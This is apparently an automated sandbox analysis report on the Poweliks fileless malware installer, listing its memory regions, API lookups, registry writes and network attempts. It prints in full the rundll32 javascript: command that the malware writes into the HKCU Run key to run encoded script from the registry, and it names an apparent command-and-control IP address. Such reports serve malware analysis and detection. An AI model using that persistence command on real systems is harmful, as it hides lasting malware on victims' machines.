Poweliks Fileless Malware | Grouped Behavior
Involved Hosts

Host Resolved to Country City Protocol
178.89.159.34 178.89.159.34 KZ DNS, TCP
178.89.159.35 178.89.159.35 KZ DNS, TCP
Monitored Processes
Behavior Information - Grouped by Category
Process #1: poweliks_installer.exe
(Host: 1622, Network: 7)
Information Value
ID #1
File Name c:\users\5p5nrgjn0js halpmcxz\desktop\poweliks_installer.exe
Command Line "C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\poweliks_installer.exe"
Initial Working Directory C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\
Monitor Start Time: 00:00:10, Reason: Analysis Target
Unmonitor End Time: 00:02:12, Reason: Terminated by Timeout
Monitor Duration 00:02:02
OS Process Information
Information Value
PID 0xa00
Parent PID 0x564 (c:\windows\explorer.exe)
Is Created or Modified Executable True
Integrity Level High (Elevated)
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Groups
  • XDUWTFONO\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • BUILTIN\Administrators (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, OWNER)
  • BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Logon Session 00000000:00010611 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID)
  • LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs 0xa04, 0xa14, 0xa8c, 0xa90
Region
Name Start VA End VA Type Permissions Monitored Dump YARA Match
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True True False
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False
private_0x0000000000020000 0x00020000 0x00020fff Private Memory Readable, Writable True True False
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True True False
private_0x0000000000030000 0x00030000 0x00030fff Private Memory Readable, Writable True True False
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False
private_0x0000000000050000 0x00050000 0x0008ffff Private Memory Readable, Writable True True False
private_0x0000000000090000 0x00090000 0x0018ffff Private Memory Readable, Writable True True False
pagefile_0x0000000000190000 0x00190000 0x00193fff Pagefile Backed Memory Readable True False False
locale.nls 0x001a0000 0x00206fff Memory Mapped File Readable False False False
private_0x0000000000210000 0x00210000 0x00224fff Private Memory Readable True True False
private_0x0000000000230000 0x00230000 0x00233fff Private Memory Readable, Writable True True False
pagefile_0x0000000000230000 0x00230000 0x00231fff Pagefile Backed Memory Readable True False False
private_0x0000000000240000 0x00240000 0x002bffff Private Memory Readable, Writable True True False
private_0x00000000002c0000 0x002c0000 0x002c3fff Private Memory Readable, Writable True True False
windowsshell.manifest 0x002c0000 0x002c0fff Memory Mapped File Readable False False False
pagefile_0x00000000002c0000 0x002c0000 0x002c0fff Pagefile Backed Memory Readable, Writable True False False
private_0x00000000002d0000 0x002d0000 0x002d6fff Private Memory Readable, Writable True True False
pagefile_0x00000000002d0000 0x002d0000 0x002d1fff Pagefile Backed Memory Readable True False False
private_0x00000000002e0000 0x002e0000 0x0033ffff Private Memory Readable, Writable True True False
index.dat 0x002e0000 0x002ebfff Memory Mapped File Readable, Writable True False False
index.dat 0x002f0000 0x002f7fff Memory Mapped File Readable, Writable True False False
private_0x0000000000300000 0x00300000 0x0033ffff Private Memory Readable, Writable True True False
index.dat 0x00340000 0x0034ffff Memory Mapped File Readable, Writable True False False
private_0x0000000000350000 0x00350000 0x0038ffff Private Memory Readable, Writable True True False
private_0x0000000000390000 0x00390000 0x00390fff Private Memory Readable, Writable True True False
private_0x0000000000390000 0x00390000 0x00393fff Private Memory Readable, Writable True True False
private_0x00000000003a0000 0x003a0000 0x003a4fff Private Memory Readable, Writable True True False
private_0x00000000003b0000 0x003b0000 0x003b5fff Private Memory Readable, Writable True True False
private_0x00000000003c0000 0x003c0000 0x003c7fff Private Memory Readable, Writable True True False
private_0x00000000003d0000 0x003d0000 0x003e2fff Private Memory Readable, Writable True True False
pagefile_0x00000000003f0000 0x003f0000 0x003f0fff Pagefile Backed Memory Readable True False False
poweliks_installer.exe 0x00400000 0x00414fff Memory Mapped File Readable, Writable, Executable True True False
private_0x0000000000420000 0x00420000 0x004bffff Private Memory Readable, Writable True True False
pagefile_0x0000000000420000 0x00420000 0x00420fff Pagefile Backed Memory Readable True False False
scrrun.dll 0x00430000 0x00444fff Memory Mapped File Readable False False False
scrrun.dll 0x00450000 0x00464fff Memory Mapped File Readable False False False
private_0x0000000000470000 0x00470000 0x004affff Private Memory Readable, Writable True True False
private_0x00000000004b0000 0x004b0000 0x004bffff Private Memory Readable, Writable True True False
private_0x00000000004c0000 0x004c0000 0x005bffff Private Memory Readable, Writable True True False
private_0x00000000005c0000 0x005c0000 0x006bffff Private Memory Readable, Writable True True False
private_0x00000000006c0000 0x006c0000 0x006fffff Private Memory Readable, Writable True True False
private_0x0000000000740000 0x00740000 0x0074ffff Private Memory Readable, Writable True True False
pagefile_0x0000000000750000 0x00750000 0x008d7fff Pagefile Backed Memory Readable True False False
pagefile_0x00000000008e0000 0x008e0000 0x00a60fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000000a70000 0x00a70000 0x01e6ffff Pagefile Backed Memory Readable True False False
sortdefault.nls 0x01e70000 0x0213efff Memory Mapped File Readable False False False
private_0x0000000002140000 0x02140000 0x0226ffff Private Memory Readable, Writable True True False
private_0x0000000002140000 0x02140000 0x0222ffff Private Memory Readable, Writable True True False
private_0x0000000002230000 0x02230000 0x0226ffff Private Memory Readable, Writable True True False
private_0x0000000002270000 0x02270000 0x0236ffff Private Memory Readable, Writable True True False
private_0x0000000002270000 0x02270000 0x0235ffff Private Memory Readable, Writable True True False
private_0x0000000002360000 0x02360000 0x0236ffff Private Memory Readable, Writable True True False
private_0x0000000002370000 0x02370000 0x0247ffff Private Memory Readable, Writable True True False
pagefile_0x0000000002480000 0x02480000 0x0255efff Pagefile Backed Memory Readable True False False
private_0x0000000002560000 0x02560000 0x0265ffff Private Memory Readable, Writable True True False
private_0x0000000002660000 0x02660000 0x0275ffff Private Memory Readable, Writable True True False
uxtheme.dll 0x738b0000 0x7392ffff Memory Mapped File Readable, Writable, Executable False False False
wow64win.dll 0x73a70000 0x73acbfff Memory Mapped File Readable, Writable, Executable False False False
wow64.dll 0x73ad0000 0x73b0efff Memory Mapped File Readable, Writable, Executable False False False
wow64cpu.dll 0x73b40000 0x73b47fff Memory Mapped File Readable, Writable, Executable False False False
jscript.dll 0x74a70000 0x74b21fff Memory Mapped File Readable, Writable, Executable True False False
sxs.dll 0x74bc0000 0x74c1efff Memory Mapped File Readable, Writable, Executable False False False
version.dll 0x74c20000 0x74c28fff Memory Mapped File Readable, Writable, Executable False False False
scrrun.dll 0x74c30000 0x74c59fff Memory Mapped File Readable, Writable, Executable False False False
rasadhlp.dll 0x74c60000 0x74c65fff Memory Mapped File Readable, Writable, Executable False False False
fwpuclnt.dll 0x74c70000 0x74ca7fff Memory Mapped File Readable, Writable, Executable False False False
winrnr.dll 0x74cb0000 0x74cb7fff Memory Mapped File Readable, Writable, Executable False False False
pnrpnsp.dll 0x74cc0000 0x74cd1fff Memory Mapped File Readable, Writable, Executable False False False
napinsp.dll 0x74ce0000 0x74ceffff Memory Mapped File Readable, Writable, Executable False False False
nlaapi.dll 0x74cf0000 0x74cfffff Memory Mapped File Readable, Writable, Executable False False False
wshtcpip.dll 0x74d00000 0x74d04fff Memory Mapped File Readable, Writable, Executable False False False
mswsock.dll 0x74d10000 0x74d4bfff Memory Mapped File Readable, Writable, Executable False False False
winnsi.dll 0x74d50000 0x74d56fff Memory Mapped File Readable, Writable, Executable False False False
iphlpapi.dll 0x74d60000 0x74d7bfff Memory Mapped File Readable, Writable, Executable False False False
dnsapi.dll 0x74d80000 0x74dc3fff Memory Mapped File Readable, Writable, Executable False False False
ntmarta.dll 0x74dd0000 0x74df0fff Memory Mapped File Readable, Writable, Executable False False False
profapi.dll 0x74e00000 0x74e0afff Memory Mapped File Readable, Writable, Executable False False False
comctl32.dll 0x74e10000 0x74fadfff Memory Mapped File Readable, Writable, Executable False False False
cryptbase.dll 0x750b0000 0x750bbfff Memory Mapped File Readable, Writable, Executable False False False
sspicli.dll 0x750c0000 0x7511ffff Memory Mapped File Readable, Writable, Executable False False False
user32.dll 0x75120000 0x7521ffff Memory Mapped File Readable, Writable, Executable False False False
sechost.dll 0x75240000 0x75258fff Memory Mapped File Readable, Writable, Executable False False False
msvcrt.dll 0x75260000 0x7530bfff Memory Mapped File Readable, Writable, Executable False False False
kernelbase.dll 0x75320000 0x75365fff Memory Mapped File Readable, Writable, Executable False False False
ws2_32.dll 0x75380000 0x753b4fff Memory Mapped File Readable, Writable, Executable False False False
rpcrt4.dll 0x753c0000 0x754affff Memory Mapped File Readable, Writable, Executable False False False
gdi32.dll 0x754e0000 0x7556ffff Memory Mapped File Readable, Writable, Executable False False False
ole32.dll 0x75570000 0x756cbfff Memory Mapped File Readable, Writable, Executable False False False
clbcatq.dll 0x756d0000 0x75752fff Memory Mapped File Readable, Writable, Executable False False False
shell32.dll 0x75790000 0x763d9fff Memory Mapped File Readable, Writable, Executable False False False
oleaut32.dll 0x763e0000 0x7646efff Memory Mapped File Readable, Writable, Executable False False False
urlmon.dll 0x76470000 0x765a5fff Memory Mapped File Readable, Writable, Executable False False False
kernel32.dll 0x765b0000 0x766bffff Memory Mapped File Readable, Writable, Executable False False False
lpk.dll 0x76750000 0x76759fff Memory Mapped File Readable, Writable, Executable False False False
advapi32.dll 0x76760000 0x767fffff Memory Mapped File Readable, Writable, Executable False False False
crypt32.dll 0x768e0000 0x769fcfff Memory Mapped File Readable, Writable, Executable False False False
msctf.dll 0x76a00000 0x76acbfff Memory Mapped File Readable, Writable, Executable False False False
imm32.dll 0x76ad0000 0x76b2ffff Memory Mapped File Readable, Writable, Executable False False False
usp10.dll 0x76b30000 0x76bccfff Memory Mapped File Readable, Writable, Executable False False False
nsi.dll 0x76bd0000 0x76bd5fff Memory Mapped File Readable, Writable, Executable False False False
wininet.dll 0x76be0000 0x76cd4fff Memory Mapped File Readable, Writable, Executable False False False
wldap32.dll 0x76ce0000 0x76d24fff Memory Mapped File Readable, Writable, Executable False False False
iertutil.dll 0x76d30000 0x76f2afff Memory Mapped File Readable, Writable, Executable False False False
shlwapi.dll 0x77100000 0x77156fff Memory Mapped File Readable, Writable, Executable False False False
private_0x0000000077160000 0x77160000 0x77259fff Private Memory Readable, Writable, Executable True True False
private_0x0000000077260000 0x77260000 0x7737efff Private Memory Readable, Writable, Executable True True False
ntdll.dll 0x77380000 0x77528fff Memory Mapped File Readable, Writable, Executable False False False
msasn1.dll 0x77530000 0x7753bfff Memory Mapped File Readable, Writable, Executable False False False
ntdll.dll 0x77560000 0x776dffff Memory Mapped File Readable, Writable, Executable False False False
private_0x000000007efad000 0x7efad000 0x7efaffff Private Memory Readable, Writable True True False
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False
private_0x000000007efd5000 0x7efd5000 0x7efd7fff Private Memory Readable, Writable True True False
private_0x000000007efd8000 0x7efd8000 0x7efdafff Private Memory Readable, Writable True True False
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True True False
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True True False
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True True False
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True True False
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False
Modified Files
Filename File Size Hash Values YARA Match
c:\users\5p5nrgjn0js halpmcxz\appdata\local\microsoft\windows\temporary internet files\content.ie5\index.dat 48.00 KB (49152 bytes)
MD5: e240cbb4588ea4f6d728281bb03d4868
SHA1: e0ecab06cf1a6d34af4f54ea2fde9189572ede3d
SHA256: 5eb84960d0e21d21afbee036ca968627e0920a0ec9ad0804e6271b15441ef2a5
YARA Match: False
c:\users\5p5nrgjn0js halpmcxz\appdata\roaming\microsoft\windows\cookies\index.dat 32.00 KB (32768 bytes)
MD5: 52860b79194a2bd3b1e66300587b21cf
SHA1: faa8d7915f6733c93678128d032d26c150eb1550
SHA256: b3e7c1e6e0d6859d21aadf673fc01f33289fb30ce4b39edb6ecaccc0f8ff6f0a
YARA Match: False
c:\users\5p5nrgjn0js halpmcxz\appdata\local\microsoft\windows\history\history.ie5\index.dat 64.00 KB (65536 bytes)
MD5: fbdf4ba6c43b1ae50b9cef65661d27d5
SHA1: b82e77ed9a3dff893f0a5266c470ed67d3f48856
SHA256: c608d3ec31fe48785961b02a20dc1e9f1e2c5710e4c6ae9ddbb1472db238ec73
YARA Match: False
Host Behavior
File (2)
Operation Filename Additional Information Success Count
Get Info STD_INPUT_HANDLE type = attributes,time,size,volserialno False 2
Registry (5)
Operation Key Additional Information Success Count
Create Key HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run True 1
Create Key HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\ True 1
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Script\Features False 1
Write Value HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run data = rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write("\74script language=jscript.encode>"+(new%20ActiveXObject("WScript.Shell")).RegRead("HKCU\\software\\microsoft\\windows\\currentversion\\run\\")+"\74/script>"), size = 464, type = REG_SZ True 1
Write Value HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run data = [encoded JScript payload, 61266 bytes, omitted], size = 61266, type = REG_SZ True 1
Process (1)
Operation Process Additional Information Success Count
Create C:\Windows\system32\rundll32.exe os_pid = 0xa3c, show_window = SW_HIDE True 1
Module (1604)
Operation Module Additional Information Success Count
Load ntdll base_address = 0x77560000 True 1
Load shlwapi base_address = 0x77100000 True 2
Load user32 base_address = 0x75120000 True 249
Load KERNEL32.dll base_address = 0x765b0000 True 1
Load ntdll.dll base_address = 0x77560000 True 1
Load WS2_32.dll base_address = 0x75380000 True 1
Load SHLWAPI.dll base_address = 0x77100000 True 1
Load urlmon.dll base_address = 0x76470000 True 1
Load RPCRT4.dll base_address = 0x753c0000 True 1
Load WININET.dll base_address = 0x76be0000 True 1
Load ADVAPI32.dll base_address = 0x76760000 True 2
Load SHELL32.dll base_address = 0x75790000 True 1
Load ole32.dll base_address = 0x75570000 True 1
Load OLEAUT32.dll base_address = 0x763e0000 True 1
Get Handle c:\windows\syswow64\kernel32.dll base_address = 0x765b0000 True 1
Get Handle c:\windows\syswow64\kernel32.dll base_address = 0x765b0000 True 5
Get Handle c:\windows\syswow64\ntdll.dll base_address = 0x77560000 True 1
Get Handle WS2_32.dll base_address = 0x0 False 1
Get Handle c:\windows\syswow64\shlwapi.dll base_address = 0x77100000 True 1
Get Handle urlmon.dll base_address = 0x0 False 1
Get Handle c:\windows\syswow64\rpcrt4.dll base_address = 0x753c0000 True 1
Get Handle c:\windows\syswow64\wininet.dll base_address = 0x76be0000 True 1
Get Handle c:\windows\syswow64\advapi32.dll base_address = 0x76760000 True 1
Get Handle SHELL32.dll base_address = 0x0 False 1
Get Handle c:\windows\syswow64\ole32.dll base_address = 0x75570000 True 1
Get Handle c:\windows\syswow64\oleaut32.dll base_address = 0x763e0000 True 1
Get Handle c:\users\5p5nrgjn0js halpmcxz\desktop\poweliks_installer.exe base_address = 0x400000 True 1
Get Filename c:\users\5p5nrgjn0js halpmcxz\desktop\poweliks_installer.exe process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\poweliks_installer.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\poweliks_installer.exe, size = 260 True 1
Get Filename SHELL32.dll process_name = c:\users\5p5nrgjn0js halpmcxz\desktop\poweliks_installer.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\poweliks_installer.exe, size = 260 True 1
Get Address c:\windows\syswow64\user32.dll function = IsCharAlphaNumericW, address_out = 0x75147792 True 249
Get Address c:\windows\syswow64\user32.dll function = IsCharAlphaNumericA, address_out = 0x75146867 True 249
Get Address c:\windows\syswow64\user32.dll function = IsCharLowerA, address_out = 0x75194e30 True 249
Get Address c:\windows\syswow64\kernel32.dll function = lstrcmpiA, address_out = 0x765c3e8e True 498
Get Address c:\windows\syswow64\kernel32.dll function = CreateProcessA, address_out = 0x765c1072 True 1
Get Address c:\windows\syswow64\kernel32.dll function = DeleteFileA, address_out = 0x765c5444 True 1
Get Address c:\windows\syswow64\kernel32.dll function = MoveFileExA, address_out = 0x765eccc1 True 1
Get Address c:\windows\syswow64\kernel32.dll function = ExpandEnvironmentStringsA, address_out = 0x765deb39 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetTempPathW, address_out = 0x765dd4dc True 1
Get Address c:\windows\syswow64\kernel32.dll function = CopyFileW, address_out = 0x765e830d True 1
Get Address c:\windows\syswow64\kernel32.dll function = WaitForSingleObject, address_out = 0x765c1136 True 1
Get Address c:\windows\syswow64\kernel32.dll function = CopyFileA, address_out = 0x765e58e5 True 1
Get Address c:\windows\syswow64\kernel32.dll function = ExpandEnvironmentStringsW, address_out = 0x765c4173 True 1
Get Address c:\windows\syswow64\kernel32.dll function = CreateProcessW, address_out = 0x765c103d True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetExitCodeProcess, address_out = 0x765d174d True 1
Get Address c:\windows\syswow64\kernel32.dll function = OpenEventA, address_out = 0x765c4a45 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleFileNameA, address_out = 0x765c14b1 True 1
Get Address c:\windows\syswow64\kernel32.dll function = Sleep, address_out = 0x765c10ff True 1
Get Address c:\windows\syswow64\kernel32.dll function = ExitProcess, address_out = 0x765c7a10 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetTickCount, address_out = 0x765c110c True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetVersionExA, address_out = 0x765c3519 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleA, address_out = 0x765c1245 True 1
Get Address c:\windows\syswow64\kernel32.dll function = VirtualFree, address_out = 0x765c186e True 1
Get Address c:\windows\syswow64\kernel32.dll function = VirtualAlloc, address_out = 0x765c1856 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetLastError, address_out = 0x765c11c0 True 1
Get Address c:\windows\syswow64\kernel32.dll function = GetProcAddress, address_out = 0x765c1222 True 1
Get Address c:\windows\syswow64\kernel32.dll function = DeleteFileW, address_out = 0x765c89b3 True 1
Get Address c:\windows\syswow64\kernel32.dll function = CloseHandle, address_out = 0x765c1410 True 1
Get Address c:\windows\syswow64\ntdll.dll function = strstr, address_out = 0x775dc780 True 1
Get Address c:\windows\syswow64\ntdll.dll function = atoi, address_out = 0x775ad2f3 True 1
Get Address c:\windows\syswow64\ntdll.dll function = ZwSetValueKey, address_out = 0x775801b4 True 1
Get Address c:\windows\syswow64\ntdll.dll function = _snwprintf, address_out = 0x77592417 True 1
Get Address c:\windows\syswow64\ntdll.dll function = _itoa, address_out = 0x775ad2c6 True 1
Get Address c:\windows\syswow64\ntdll.dll function = strncat, address_out = 0x775dc570 True 1
Get Address c:\windows\syswow64\ntdll.dll function = strncpy, address_out = 0x775d5c30 True 1
Get Address c:\windows\syswow64\ntdll.dll function = sscanf, address_out = 0x776354a7 True 1
Get Address c:\windows\syswow64\ntdll.dll function = RtlRandom, address_out = 0x776298c3 True 1
Get Address c:\windows\syswow64\ntdll.dll function = _snprintf, address_out = 0x77634760 True 1
Get Address c:\windows\syswow64\ntdll.dll function = _vsnprintf, address_out = 0x775d9d88 True 1
Get Address c:\windows\syswow64\ntdll.dll function = memset, address_out = 0x7758df20 True 1
Get Address c:\windows\syswow64\ntdll.dll function = RtlAdjustPrivilege, address_out = 0x77611f40 True 1
Get Address c:\windows\syswow64\ntdll.dll function = ZwCreateKey, address_out = 0x7757fb30 True 1
Get Address c:\windows\syswow64\ntdll.dll function = _chkstk, address_out = 0x7759ad68 True 1
Get Address c:\windows\syswow64\ws2_32.dll function = 3, address_out = 0x75383918 True 1
Get Address c:\windows\syswow64\ws2_32.dll function = 19, address_out = 0x75386f01 True 1
Get Address c:\windows\syswow64\ws2_32.dll function = 4, address_out = 0x75386bdd True 1
Get Address c:\windows\syswow64\ws2_32.dll function = 52, address_out = 0x75397673 True 1
Get Address c:\windows\syswow64\ws2_32.dll function = 23, address_out = 0x75383eb8 True 1
Get Address c:\windows\syswow64\ws2_32.dll function = 115, address_out = 0x75383ab2 True 1
Get Address c:\windows\syswow64\ws2_32.dll function = 16, address_out = 0x75386b0e True 1
Get Address c:\windows\syswow64\shlwapi.dll function = PathFileExistsA, address_out = 0x7713ad1a True 1
Get Address c:\windows\syswow64\shlwapi.dll function = PathFindFileNameW, address_out = 0x7711bb71 True 1
Get Address c:\windows\syswow64\shlwapi.dll function = PathAppendW, address_out = 0x771181ef True 1
Get Address c:\windows\syswow64\shlwapi.dll function = StrStrIA, address_out = 0x7710d250 True 1
Get Address c:\windows\syswow64\shlwapi.dll function = SHGetValueA, address_out = 0x7710cf09 True 1
Get Address c:\windows\syswow64\urlmon.dll function = URLDownloadToCacheFileW, address_out = 0x764ae4a0 True 1
Get Address c:\windows\syswow64\rpcrt4.dll function = UuidCreateSequential, address_out = 0x753e7c12 True 1
Get Address c:\windows\syswow64\wininet.dll function = InternetCrackUrlA, address_out = 0x76bed075 True 1
Get Address c:\windows\syswow64\advapi32.dll function = OpenProcessToken, address_out = 0x76774304 True 1
Get Address c:\windows\syswow64\advapi32.dll function = RegSetKeySecurity, address_out = 0x7676b2d4 True 1
Get Address c:\windows\syswow64\advapi32.dll function = RegCloseKey, address_out = 0x7677469d True 1
Get Address c:\windows\syswow64\advapi32.dll function = GetSidSubAuthority, address_out = 0x76770e24 True 1
Get Address c:\windows\syswow64\advapi32.dll function = GetSidSubAuthorityCount, address_out = 0x76770e0c True 1
Get Address c:\windows\syswow64\advapi32.dll function = RegCreateKeyExA, address_out = 0x76771469 True 1
Get Address c:\windows\syswow64\advapi32.dll function = RegSetValueExW, address_out = 0x767714d6 True 1
Get Address c:\windows\syswow64\advapi32.dll function = RegFlushKey, address_out = 0x7678773f True 1
Get Address c:\windows\syswow64\advapi32.dll function = GetTokenInformation, address_out = 0x7677431c True 1
Get Address c:\windows\syswow64\advapi32.dll function = RegOpenKeyExA, address_out = 0x76774907 True 2
Get Address c:\windows\syswow64\shell32.dll function = ShellExecuteExW, address_out = 0x757b1e46 True 1
Get Address c:\windows\syswow64\ole32.dll function = OleInitialize, address_out = 0x7558efd7 True 1
Get Address c:\windows\syswow64\ole32.dll function = CoCreateInstance, address_out = 0x755b9d0b True 1
Get Address c:\windows\syswow64\oleaut32.dll function = 6, address_out = 0x763e3e59 True 1
Get Address c:\windows\syswow64\oleaut32.dll function = 2, address_out = 0x763e4642 True 1
Get Address c:\windows\syswow64\kernel32.dll function = IsWow64Process, address_out = 0x765c195e True 3
Get Address c:\windows\syswow64\advapi32.dll function = RegisterTraceGuidsA, address_out = 0x775c848f True 2
Get Address c:\windows\syswow64\kernel32.dll function = Wow64DisableWow64FsRedirection, address_out = 0x765dd650 True 1
COM (1)
Operation Additional Information Success Count
Create interface = AADC65F6-CFF1-11D1-B747-00C04FC2B085, cls_context = CLSCTX_INPROC_SERVER True 1
System (7)
Operation Additional Information Success Count
Get Info type = System Directory, result_out = C:\Windows\system32 True 2
Get Info type = Operating System False 3
Get Info type = Operating System True 2
Network Behavior
DNS (2)
Operation Additional Information Success Count
Resolve Name host = 178.89.159.34, address_out = 178.89.159.34 True 2
TCP Sessions (1)
Information Value
Total Data Sent 0.00 KB (0 bytes)
Total Data Received 0.00 KB (0 bytes)
Contacted Host Count 1
Contacted Hosts 178.89.159.34:80
TCP Session #1
Information Value
Handle 0x1a4
Address Family AF_INET
Type SOCK_STREAM
Protocol IPPROTO_TCP
Remote Address 178.89.159.34
Remote Port 80
Local Address
Local Port
Data Sent 0.00 KB (0 bytes)
Data Received 0.00 KB (0 bytes)
Operations
Operation Additional Information Success Count
Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1
Connect remote_address = 178.89.159.34, remote_port = 80 False 1
Close type = SOCK_STREAM True 1
TCP Session #2
Information Value
Handle 0x260
Address Family AF_INET
Type SOCK_STREAM
Protocol IPPROTO_TCP
Remote Address 178.89.159.34
Remote Port 80
Local Address
Local Port
Data Sent 0.00 KB (0 bytes)
Data Received 0.00 KB (0 bytes)
Operations
Operation Additional Information Success Count
Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1
Connect remote_address = 178.89.159.34, remote_port = 80 False 1
Process #2: rundll32.exe
(Host: 32, Network: 0)
Information Value
ID #2
File Name c:\windows\system32\rundll32.exe
Command Line rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write("\74script language=jscript.encode>"+(new%20ActiveXObject("WScript.Shell")).RegRead("HKCU\\software\\microsoft\\windows\\currentversion\\run\\")+"\74/script>")
Initial Working Directory C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\
Monitor Start Time: 00:00:36, Reason: Child Process
Unmonitor End Time: 00:02:12, Reason: Terminated by Timeout
Monitor Duration 00:01:36
OS Process Information
Information Value
PID 0xa3c
Parent PID 0xa00 (c:\users\5p5nrgjn0js halpmcxz\desktop\poweliks_installer.exe)
Is Created or Modified Executable False
Integrity Level High (Elevated)
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Groups
  • XDUWTFONO\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • BUILTIN\Administrators (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, OWNER)
  • BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\Logon Session 00000000:00010611 (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID)
  • LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
  • NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x A40
0x A44
0x A48
0x A4C
0x A50
0x A54
0x A60
Region
Name Start VA End VA Type Permissions Monitored Dump YARA Match Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True True False
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False
pagefile_0x0000000000020000 0x00020000 0x00026fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000000030000 0x00030000 0x00033fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000000040000 0x00040000 0x00040fff Pagefile Backed Memory Readable True False False
locale.nls 0x00050000 0x000b6fff Memory Mapped File Readable False False False
pagefile_0x00000000000c0000 0x000c0000 0x000c1fff Pagefile Backed Memory Readable, Writable True False False
private_0x00000000000d0000 0x000d0000 0x000d0fff Private Memory Readable, Writable True True False
private_0x00000000000e0000 0x000e0000 0x000e0fff Private Memory Readable, Writable True True False
pagefile_0x00000000000f0000 0x000f0000 0x000f0fff Pagefile Backed Memory Readable, Writable True False False
pagefile_0x0000000000100000 0x00100000 0x00100fff Pagefile Backed Memory Readable True False False
private_0x0000000000110000 0x00110000 0x0018ffff Private Memory Readable, Writable True True False
private_0x0000000000190000 0x00190000 0x0028ffff Private Memory Readable, Writable True True False
pagefile_0x0000000000290000 0x00290000 0x00290fff Pagefile Backed Memory Readable True False False
pagefile_0x00000000002a0000 0x002a0000 0x002a0fff Pagefile Backed Memory Readable, Writable True False False
pagefile_0x00000000002b0000 0x002b0000 0x002b1fff Pagefile Backed Memory Readable True False False
private_0x00000000002c0000 0x002c0000 0x002cffff Private Memory Readable, Writable True True False
pagefile_0x00000000002d0000 0x002d0000 0x002d1fff Pagefile Backed Memory Readable True False False
private_0x00000000002e0000 0x002e0000 0x0031ffff Private Memory Readable, Writable True True False
msctf.dll.mui 0x00320000 0x00320fff Memory Mapped File Readable, Writable False False False
private_0x0000000000330000 0x00330000 0x0042ffff Private Memory Readable, Writable True True False
pagefile_0x0000000000430000 0x00430000 0x005b7fff Pagefile Backed Memory Readable True False False
